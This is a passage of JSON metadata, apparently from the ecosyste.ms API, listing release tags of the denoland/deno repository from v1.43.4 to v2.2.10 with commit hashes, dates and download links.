github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","depen